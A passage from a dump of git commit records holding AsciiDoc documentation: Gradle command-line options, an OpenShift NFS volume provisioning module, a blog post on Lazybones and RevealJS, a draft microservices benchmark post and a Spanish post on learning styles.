Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<cache_command_line_options,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the dependency management docs.<<cache_command_line_options, dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n[[sec:command_line_bootstrapping_projects]]\n=== Bootstrapping new projects\n\n==== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n\u276f gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin, init plugin documentation>> for details.\n\n----\n\u276f gradle init --type java-library\n----\n\n==== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n\u276f gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper,Gradle wrapper section>>.\n\n=== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-u`, `--no-search-upward` (deprecated)::\nDon't search in parent directories for a `settings.gradle` file.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<sec:gradle_system_properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<sec:project_properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_project_reporting]]\n=== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n==== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n\u276f gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n==== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n\u276f gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n\u276f gradle tasks --all\n----\n\n[[sec:show_task_details]]\n==== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n++++\n<sample id=\"taskHelp\" dir=\"userguide\/tutorial\/projectReports\" title=\"Obtaining detailed help for tasks\">\n <output args=\"-q help --task libs\"\/>\n<\/sample>\n++++\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n==== Reporting dependencies\n\nBuild scans give a full, visual report of what project and binary dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n\u276f gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::img\/gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\n==== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n\u276f gradle dependencies\n----\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n\u276f gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n\u276f gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n++++\n<sample id=\"dependencyListReportFiltered\" dir=\"userguide\/tutorial\/projectReports\" title=\"Filtering dependency report by configuration\">\n <output args=\"-q api:dependencies --configuration testCompile\"\/>\n<\/sample>\n++++\n\n[[sec:listing_properties]]\n==== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n++++\n<sample id=\"propertyListReport\" dir=\"userguide\/tutorial\/projectReports\" title=\"Information about properties\">\n <output args=\"-q api:properties\" ignoreExtraLines=\"true\"\/>\n<\/sample>\n++++\n\n==== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model,software model>> projects (deprecated) using the `model` task:\n\n----\n\u276f gradle model\n----\n\nLearn more about <<model-report,the model report>> in the software model documentation.\n\n=== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n==== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n\u276f gradle build\n----\n\n==== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n\u276f gradle run\n----\n\n==== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n\u276f gradle check\n----\n\n==== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n\u276f gradle clean\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"683961e2de953a0eade5864e266d4f02372291bd","subject":"BZ1759428 to align sample capacity to 5Gi","message":"BZ1759428 to align sample capacity to 5Gi\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/storage-persistent-storage-nfs-provisioning.adoc","new_file":"modules\/storage-persistent-storage-nfs-provisioning.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/persistent-storage\/persistent-storage-nfs.adoc\n\n[id=\"persistent-storage-nfs-provisioning_{context}\"]\n= Provisioning\n\nStorage must exist in the underlying infrastructure before it can be\nmounted as a volume in {product-title}. To provision NFS volumes,\na list of NFS servers and export paths are all that is required.\n\n.Procedure\n\n. Create an object definition for the PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Retain <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume,\nit is actually used similarly to labels and used to match a PVC to a PV.\nCurrently, no access rules are enforced based on the `accessModes`.\n<4> The volume type being used, in this case the `nfs` plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume\nwhen released.\n+\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\n. Verify that the PV was created:\n+\n----\n$ oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n\n. Create a persistent volume claim that binds to the new PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 5Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim looks for PVs offering *5Gi* or greater capacity.\n\n. Verify that the persistent volume claim was created:\n+\n----\n$ oc get pvc\nNAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE\nnfs-claim1 Bound pv0001 5Gi RWO gp2 2m\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/persistent-storage\/persistent-storage-nfs.adoc\n\n[id=\"persistent-storage-nfs-provisioning_{context}\"]\n= Provisioning\n\nStorage must exist in the underlying infrastructure before it can be\nmounted as a volume in {product-title}. To provision NFS volumes,\na list of NFS servers and export paths are all that is required.\n\n.Procedure\n\n. Create an object definition for the PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Retain <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume,\nit is actually used similarly to labels and used to match a PVC to a PV.\nCurrently, no access rules are enforced based on the `accessModes`.\n<4> The volume type being used, in this case the `nfs` plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume\nwhen released.\n+\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\n. Verify that the PV was created:\n+\n----\n$ oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n\n. Create a persistent volume claim which binds to the new PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 5Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim looks for PVs offering *1Gi* or greater capacity.\n\n. Verify that the persistent volume claim was created:\n+\n----\n$ oc get pvc\nNAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE\nnfs-claim1 Bound pv0001 4Gi RWO gp2 2m\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8517268cf142bc05792190bbd4c1ecd819bf080","subject":"Update 2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","message":"Update 2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_contents":"= How long does it take you to create a RevealJS presentation ?\n\n:hp-tags: asciidoctor, revealjs, lazybones\n\nAfter a couple of months, I finally found a topic to write the very first post in my new http:\/\/hubpress.io\/[Hubpress.io] blog.\n\nToday, we are going to talk about *Asciidoctor* and *RevealJS*. As you might know, you can use Asciidoctor to write and create RevealJS presentations. Therefore, if you are not familiar with Asciidoctor creating the first presentation can be tricky especially if you plan to use diagrams (or other external modules).\n\nRecently thanks to Andres Almiray (https:\/\/twitter.com\/aalmiray[@aalmiray]), I discovered https:\/\/github.com\/pledbrook\/lazybones[Lazybones]. A very simple template generator for Gradle projects. With Lazybones you can start a Gradle projects such as Spring boot, Groovy or even AsciidoctorJ using only 1 command. Therefore you still had to customize the generated project to be able to generate a RevealJS slideshow.\n\nThat's why I have created the Asciidoctor-RevealJS template for Lazybones.\n\n== Long story short\n\n=== Let's play\n\nOnce you installed everything (http:\/\/gvmtool.net[GVM] and Lazybones) all you need to do is:\n\n[source]\n$ lazybones create asciidoctor-revealjs 1.0.0 myAwesomePresentation\n\nThen answer the questions (title for your presentation, who you are and the revealjs theme to use) and you are good to go.\nicon:thumbs-o-up[]\n\nIf you look your current directory you'll found something like:\n\n[source]\n----\ngscheibel@~\/labs\/adocs\/blog\/myAwesomePresentation $ tree\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 build.gradle\n\u2514\u2500\u2500 src\n \u2514\u2500\u2500 docs\n \u2514\u2500\u2500 asciidoc\n \u251c\u2500\u2500 images\n \u251c\u2500\u2500 slides\n \u251c\u2500\u2500 slides.adoc\n \u251c\u2500\u2500 snippets\n \u2514\u2500\u2500 styles\n----\n\nAll you need is under `src\/docs\/asciidoc\/`, by default the main slide is `slides.adoc`. Remember the questions asked during the presentation setup, those information (title and author) are reused here. The theme can be found in the `build.gradle` file.\n\n[source]\n----\n= Asciidoctor is awesome\nGuillaume Scheibel <guillaume.scheibel@gmail.com>\n\n:imagesdir: images\n:sourcedir: snippets\n----\n\n=== Let's write\n\nA way to create your presentation is `one slide one file`, it means every time you want to create a slide, you create a file (in slides\/ for instance) and then include it in slides.adoc using the include directive (eg: `include::slides\/coolSlides.adoc[]`)\n\n\n=== Let's create\n\nTo create your presentation, all you need is a simple\n\n[source]\n$ gradle asciidoctor\n\nThen you'll find your presentation under `build\/asciidoc\/html5`.\n\nInterested by hot-relaod while you're writing ? `gradle watch` is going to become your best friend.\n\n== Finally\n\nTo answer the question in the title, it only takes few seconds to create an RevealJS presentation thanks to *Asciidoctor* and *Lazybones*.\nThe template sources are available on https:\/\/github.com\/asciidoctor\/asciidoctor-lazybones[Github] and the binaries on https:\/\/bintray.com\/asciidoctor\/maven\/asciidoctor-revealjs-template\/view[Bintray].\n\n\n","old_contents":"= How long does it take you to create a RevealJS presentation ?\n\n:hp-tags: asciidoctor, revealjs, lazybones\n\nAfter couple of months, I finally found a topic to write the very first post in my new http:\/\/hubpress.io\/[Hubpress.io] blog.\n\nToday, we are going to talk about *Asciidoctor* and *RevealJS*. As you might know, you can use Asciidoctor to write and create RevealJS presentations. Therefore, if you are not familiar with Asciidoctor creating the first presentation can be tricky especially if you plan to use diagrams (or other external modules).\n\nRecently thanks to Andres Almiray (https:\/\/twitter.com\/aalmiray[@aalmiray]), I discovered https:\/\/github.com\/pledbrook\/lazybones[Lazybones]. A very simple template generator for Gradle projects. With Lazybones you can start a Gradle projects such as Spring boot, Groovy or even AsciidoctorJ using only 1 command. Therefore you still had to customize the generated project to be able to generate a RevealJS slideshow.\n\nThat's why I have created the Asciidoctor-RevealJS template for Lazybones.\n\n== Long story short\n\n=== Let's play\n\nOnce you installed everything (GVM and Lazybones) all you need to do is:\n\n[source]\n$ lazybones create asciidoctor-revealjs 1.0.0 myAwesomePresentation\n\nThen answer the questions (title for your presentation, who you are and the revealjs theme) and you are good to go.\nicon:thumbs-o-up[]\n\nIf you look your current directory you will found something like:\n\n[source]\n----\ngscheibel@~\/labs\/adocs\/blog\/myAwesomePresentation $ tree\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 build.gradle\n\u2514\u2500\u2500 src\n \u2514\u2500\u2500 docs\n \u2514\u2500\u2500 asciidoc\n \u251c\u2500\u2500 images\n \u251c\u2500\u2500 slides\n \u251c\u2500\u2500 slides.adoc\n \u251c\u2500\u2500 snippets\n \u2514\u2500\u2500 styles\n----\n\nAll you need is under `src\/docs\/asciidoc\/`, by default the main slide is `slides.adoc`. Remember the questions asked during the presentation setup, those information (title and author) are reused here. The theme can be found in the `build.gradle` file.\n\n[source]\n----\n= Asciidoctor is awesome\nGuillaume Scheibel <guillaume.scheibel@gmail.com>\n\n:imagesdir: images\n:sourcedir: snippets\n----\n\n=== Let's write\n\nA way to create your presentation is `one slide one file`, it means every time you want to create a slide, you create a file (in slides\/ for instance) and then include it in slides.adoc using the include directive (eg: `include::slides\/coolSlides.adoc[]`)\n\n\n=== Let's create\n\nTo create your presentation, all you need is a simple\n\n[source]\n$ gradle asciidoctor\n\nThen you'll find your presentation under `build\/asciidoc\/html5`.\n\nInterested by hot-relaod while you're writing ? `gradle watch` is going to become your best friend.\n\n== Finally\n\nTo answer the question in the title, it only takes few seconds to create an RevealJS presentation thanks to *Asciidoctor* and *Lazybones*.\nThe template sources are available on https:\/\/github.com\/asciidoctor\/asciidoctor-lazybones[Github] and the binaries on https:\/\/bintray.com\/asciidoctor\/maven\/asciidoctor-revealjs-template\/view[Bintray].\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"fff9e7de6895e8d161dce409e48451ac99ff6514","subject":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","message":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_contents":"= Performance of Microservices frameworks\n:hp-tags: Tech, Microservices, REST, performance\n\n\nThis is the follow-up of my article about https:\/\/cdelmas.github.io\/2015\/11\/01\/A-comparison-of-Microservices-Frameworks.html[Microservices Frameworks].\n\n[options=\"header\"]\n|===\n| Framework | Package size (MB) | Startup time (ms) 4+| GET (over 5 min) 4+| POST (over 10 min)\n\n| | | | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* \n\n| Dropwizard |15 | 1047 | | | | | | | | \n\n| Restlet |4,2 | 110 | | | | | | | | \n\n| Restlet \/ Jetty | 5,8| 110 | | | | | | | | \n\n| Restlet \/ Simple |4,5 | 110 | | | | | | | | \n\n| Sparkjava |4,1 | 290 | | | | | | | | \n\n| Spring Boot \/ Tomcat | 14 |6905 | | | | | | | | \n\n| Spring Boot \/ Jetty | 13 | 6905 | | | | | | | | \n\n| Spring Boot \/ Undertow | 14 | 6905 | | | | | | | | \n\n| vertx |5,1 | 7250 | | | | | | | | \n\n|===\n\n\n\n\nGET \/ POST\nmean\n\n- 790 ms apollo (async: 600ms)\n- 270 ms dropwizard\n- 205 ms restlet\n- ms restlet \/ Jetty\n- ms restlet \/ Simple\n- 290 ms sparkjava\n- 6905 ms spring-boot\n- 7250 ms vertx\n\nthroughput\n\n- 560 r\/s apollo\n- 1047 r\/s dropwizard\n- 110 r\/s restlet\n- 290 r\/s sparkjava\n- 6905 r\/s spring-boot\n- 7250 r\/s vertx\n\n\n\nUsing Gatling to measure the performance\n\nMethodology\n\nGet on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 5 minutes).\nPost on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 10 minutes).\n\nResponse is json-encoded POJO\nPayload is json.\n\nResults\n\nmean, throughput, errors","old_contents":"= Performance of Microservices frameworks\n:hp-tags: Tech, Microservices, REST, performance\n\n\nThis is the follow-up of my article about https:\/\/cdelmas.github.io\/2015\/11\/01\/A-comparison-of-Microservices-Frameworks.html[Microservices Frameworks].\n\n[options=\"header\"]\n|===\n| Framework | Package size (MB) | Startup time (ms) 4+| GET (over 5 min) 4+| POST (over 10 min)\n\n| | | | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* \n\n| Dropwizard |15 | 1047 | | | | | | | | \n\n| Restlet |4,2 | 110 | | | | | | | | \n\n| Restlet \/ Jetty | 5,8| 110 | | | | | | | | \n\n| Restlet \/ Simple |4,5 | 110 | | | | | | | | \n\n| Sparkjava |4,1 | 290 | | | | | | | | \n\n| Spring Boot \/ Tomcat | 14 |6905 | | | | | | | | \n\n| Spring Boot \/ Jetty | 13 | 6905 | | | | | | | | \n\n| Spring Boot \/ Undertow | 14 | 6905 | | | | | | | | \n\n| vertx |5,1 | 7250 | | | | | | | | \n\n|===\n\n\n\n\nGET \/ POST\nmean\n- 790 ms apollo (async: 600ms)\n- 270 ms dropwizard\n- 205 ms restlet\n- ms restlet \/ Jetty\n- ms restlet \/ Simple\n- 290 ms sparkjava\n- 6905 ms spring-boot\n- 7250 ms vertx\n\nthroughput\n- 560 r\/s apollo\n- 1047 r\/s dropwizard\n- 110 r\/s restlet\n- 290 r\/s sparkjava\n- 6905 r\/s spring-boot\n- 7250 r\/s vertx\n\n\n\nUsing Gatling to measure the performance\n\nMethodology\n\nGet on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 5 minutes).\nPost on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 10 minutes).\n\nResponse is json-encoded POJO\nPayload is json.\n\nResults\n\nmean, throughput, errors","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e2c16cca0b860271685ffbe50835acdd53306405","subject":"Update 2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","message":"Update 2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","new_file":"_posts\/2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","new_contents":"= Un vistazo a los estilos de aprendizaje\n:hp-tags: e-learning, innovaci\u00f3n, estilos de aprendizaje,TIC, educaci\u00f3n\n:published_at: 2016-07-12\n\n\nDentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.\n\n== Estilos de aprendizaje\n\n\n\nEl emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.\n\nimage:https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png[Estilos de aprendizaje,]\n\nRefiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:\n\n1. Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.\n\n2. Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.\n\n3. Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.\n\n4. Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.\n\n5. Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.\n\n6. Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.\n\n7. Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.\n\n8. Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.\n\nSi nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.\n\n=== \u00bfQu\u00e9 son?\n\nSe definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.\n\nSe cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.\n\nLos diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:\n\n* Condiciones ambientales\n* Bagaje cultural\n* Edad\n* Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)\n* Estilo seguido para la resoluci\u00f3n de problemas\n* Tipo de motivaci\u00f3n, locus de control interno o externo\n\nEl analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.\n\n\n=== Clasificaci\u00f3n\n\nLos modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.\n\n\nDe esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:\n\n\nimage:https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png[Calsificaci\u00f3n estilos de apredizaje, 800,400 role=right]\n\n=== Modelo de Kolb\n\nEl aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984). \n\nEl ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.\n\nimage:http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg [ciclos modelo kolb]\n\nAcorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.\n\n* Activo\n* Reflexivo\n* Te\u00f3rico\n* Pragm\u00e1tico\n\n\n\n=== Car\u00e1ter\u00edsticas de cada estilo \n\nPara lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:\n\n\n[cols=\"1,2,1,1\", options=\"header,footer,autowidth\"]\n.Caracter\u00edsticas Estilos de parendizaje modelo Kolb\n|===\nEstilo |Caracter\u00edstica General |Cuando facilita el aprendizaje |Cuando NO facilita el aprendizaje.\n|Activos\n\n|Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos. \n*La pregunta que buscan responder en el aprendizaje es: _\u00bfC\u00f3mo?_*\n\n|Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.\n\n|Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.\n\n|Reflexivo\n\n\n|Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. *La pregunta que quieren responder con el aprendizaje es: _\u00bfPor qu\u00e9?_*\n\n|Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.\n\n|Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren. \n\n|Te\u00f3ricos\n\n|Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. *La pregutna que quieren responder es: _\u00bfQu\u00e9?_*\n\n|Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o 